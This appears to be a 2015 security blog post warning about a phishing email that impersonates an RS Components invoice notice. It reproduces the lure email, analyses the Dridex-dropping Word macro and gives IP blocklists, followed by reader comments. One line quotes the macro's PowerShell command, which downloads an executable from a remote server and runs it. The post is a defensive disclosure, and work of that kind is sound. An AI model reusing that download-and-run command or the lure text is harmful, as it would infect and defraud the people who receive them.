---------------------------------------------------------------
From: Earlene Carlson
Date: 31 March 2015 at 11:30
Subject: 83433-Your Latest Documents from RS Components 659751716
 |
Helping you get your job done. You've received this email as a customer of rswww.com. |
Dear Customer, Please find attached your latest document(s) from RS.
For all account queries please contact RS Customer Account Services. Tel: 01536 752867 Fax: 01536 542205 Email: rpdf.billing@colt.net (subject box to read DOC eBilling) If you have any technical problems retrieving your documents please contact Swiss Post Solutions Helpdesk on the following: Tel: 0333 8727520 Email: customers@colt.net Kind regards, RS Customer Account Services. This service is provided by Swiss Post Solutions on behalf of RS Components. |
 |
RS Components Ltd, Birchington Road, Weldon, Corby, Northants, NN17 9RS, UK. Registered No. 1002091. http://rswww.com. RS Online Help: 01536 752867. |
---------------------------------------------------------------
The reference numbers, names and email addresses vary, but all come with a malicious and apparently randomly-named attachment (e.g. G-A6298638294134271075684-1.doc).
There are probably several different variants of this, but I have seen just one working example of the attachment which contains this malicious macro [pastebin] which executes the following command:
cmd /K powershell.exe -ExecutionPolicy bypass -noprofile (New-Object System.Net.WebClient).DownloadFile('http://185.91.175.64/jsaxo8u/g39b2cx.exe','%TEMP%\4543543.cab'); expand %TEMP%\4543543.cab %TEMP%\4543543.exe; start %TEMP%\4543543.exe;For some reason, the EXE is download from http://185.91.175.64/jsaxo8u/g39b2cx.exe with a CAB extension and then run through EXPAND which.. errr.. does nothing much. The file is saved as %TEMP%\4543543.exe, and it has a VirusTotal detection rate of 3/57.
Analysis is still pending, but the VirusTotal report does indicate the malware phone home to 188.120.225.17 (TheFirst-RU, Russia) which I strongly recommend blocking, check back for more updates later.
UPDATE:
Automated analysis [1] [2] [3] [4] show attempted connections to the following IPs:
188.120.225.17 (TheFirst-RU, Russia)
1.164.114.195 (Data Communication Business Group, Taiwan)
2.194.41.9 (Telecom Italia Mobile, Italy)
46.19.143.151 (Private Layer INC, Switzerland)
199.201.121.169 (Synaptica, Canada)
It also drops another version of the downloader binary called edg1.exe with a 2/57 detection rate plus a Dridex DLL with a detection rate of 1/57.
Recommended blocklist:
188.120.225.17
1.164.114.195
2.194.41.9
46.19.143.151
199.201.121.169
6 comments:
I've just received this email as well, I have just deleted it - thanks.
I also received this email. I opened it as it was convincing however, I did not download the file attached. I am a mac user and was wondering if anything could have snuck on to my laptop??
Thank you for the heads up, I received this and nearly panicked, it is rather convincing.
You're saving computers, THANKS! This looked very convincing, almost clicked the attachment for more info.
Yup - spam e-mail just received. Having just placed a bonafide order from RSC I was expecting an invoice so this particular scam seems to be relying on less-observant purchasers of RS products and whoever it is presumably has access to the RS sales data. RD London
Hi,
Another address worth blocking is
185.91.175.64
Post a Comment